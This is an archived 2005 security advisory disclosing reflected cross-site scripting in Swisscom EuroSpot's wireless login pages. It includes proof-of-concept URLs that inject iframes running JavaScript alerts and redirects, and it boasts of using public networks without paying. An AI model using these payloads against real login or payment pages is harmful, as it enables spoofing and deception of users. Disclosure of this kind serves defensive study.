what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

swisscom-XSS.txt

swisscom-XSS.txt
Posted Oct 30, 2005
Authored by deepquest

Swisscom EuroSpot wireless service suffers from multiple cross site scripting vulnerabilities. Details provided.

tags | exploit, vulnerability, xss
SHA-256 | 12ac9a5eaae2ce4ca5f76f2b9eed2d4b8311c75ab8487c21f985d6cf1d5e64ff

swisscom-XSS.txt

Change Mirror Download
       ___           ___           ___
/__/\ /__/\ /__/\
\ \:\ \ \:\ \ \:\
\__\:\ \__\:\ \ \:\
___ / /::\ ___ / /::\ ___ \ \:\
/__/\ /:/\:\ /__/\ /:/\:\ /__/\ \__\:\
\ \:\/:/__\/ \ \:\/:/__\/ \ \:\ / /:/
\ \::/ \ \::/ \ \:\ /:/
\ \:\ \ \:\ \ \:\/:/
\ \:\ \ \:\ \ \::/
\__\/ \__\/ \__\/



"It's secure, it's reliable, it's Swiss"


HHU
---
Homeless Hackers United is a small group of homeless hackers from
Europe and
North America. We can't afford paying for Internet access or hotel
rooms.
Our only crime is to have a laptop and wireless card, and few knowledge.
Homeless state give us the freedom to access and use various open
systems,
accessible from public places.

Who
---
Swisscom EuroSpot is a wireless service offered in airports, hotels and
other public places. Customers buy certain amount of time online and
get access
to the wireless network. The login page is of course open in order to
join and
subscribe to the service.
HHU has been able to access, and validate around several hotels and
public
places.

Severity
--------
Medium

Vulnerability
-------------
XSS, URL evasion

Details
-------
Swisscom access point seems to use radius servers to provide internet
access to
their customers. We also noticed issues on the radius
authentification process
that may be published later. After joining the network you will have
either to
buy access time or login. The following has been tested in UK,
Germany, France
and Norway.

http://login**.swisscom-eurospot.com/error.php?
error=nasunknown_ui&UI=XSS
http://login**.swisscom-eurospot.com/login.php?
LANG=de&UserID=0&RadiusReply=XSS

Proof of Concept
----------------
http://login02.swisscom-eurospot.com/error.php?
error=nasunknown_ui&UI=Please%20fix%20this%20site
http://login02.swisscom-eurospot.com/error.php?error=nasunknown_ui&UI=
%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E
http://login02.swisscom-eurospot.com/error.php?error=nasunknown_ui&UI=
%3CIFRAME%20SRC=javascript:window.parent.location.replace(%2527http://
google.com%2527)%3E%3C/IFRAME%3E

Impacts
-------
Change, spoof and fool end-users on login page or paiement page. With
a bit on
imagination it can be worst.

Timeline
--------
Discovered: august 14th 2005
Disclosure: october 28th 2005
Service Provider: no

HHU Policy
----------
HHU can't even afford food, and we're are not paid to debug softwares
or systems
for free.
We discover, then publish what we find. Will route tcp/ip packets for
food!
"Fool me once, shame on — shame on you. Fool me — you can't get
fooled again."
— George W. Bush


HHU Credits
-----------
deepquest for discovering and POC, Mescalito for more POC.
original post http://deepquest.code511.com/blog/more.php?id=319_0_1_0_M
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close